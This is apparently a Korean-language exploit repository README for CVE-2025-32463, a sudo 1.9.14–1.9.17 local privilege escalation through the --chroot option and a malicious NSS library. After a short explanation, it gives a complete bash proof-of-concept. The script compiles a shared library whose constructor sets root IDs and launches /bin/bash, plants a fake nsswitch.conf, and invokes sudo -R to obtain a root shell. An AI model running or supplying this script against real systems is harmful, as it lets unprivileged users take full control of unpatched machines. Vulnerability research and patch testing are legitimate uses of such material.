
CVE-2025-32463에 대한 개념 증명 익스플로잇으로, chroot 잘못된 구성 및 악성 NSS 라이브러리 주입을 통해 sudo 1.9.14-1.9.17에서 로컬 권한 상승을 유발합니다.
--chroot 로컬 권한 상승ExploitDB ID: 52352
이 저장소는 Sudo 1.9.14 – 1.9.17 버전에 영향을 주는 치명적인 로컬 권한 상승(LPE) 취약점을 문서화합니다.
이 취약점은 sudo -R (--chroot) 옵션의 잘못된 구현으로 인해 발생하며, sudoers 파일에서 허용되지 않더라도 공격자가 root 권한으로 명령을 실행할 수 있게 합니다.
🔥 결과: 권한 없는 사용자 → root shell
Sudo의 --chroot (-R) 매개변수는 사용자에게 자신이 지정한 루트 디렉터리 아래에서 명령을 실행할 수 있는 권한을 부여합니다.
하지만 sudo 1.9.14에서 도입된 변경으로 인해:
sudoers 파일이 아직 완전히 검증되기 전에chroot() 호출이 사용자가 지정한 디렉터리를 통해 수행됩니다이로 인해 공격자는 자신이 만든 가짜:
/etc/nsswitch.conf
파일을 통해 악의적인 NSS 라이브러리(libnss_*.so)를 root 권한으로 로드되게 할 수 있습니다.
nsswitch.conf가 준비됩니다sudo -R <dir> <command> 호출이 수행됩니다⚠️ 교육 및 테스트 환경에서만 사용하십시오
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash","/bin/bash",NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
sudo -R woot woot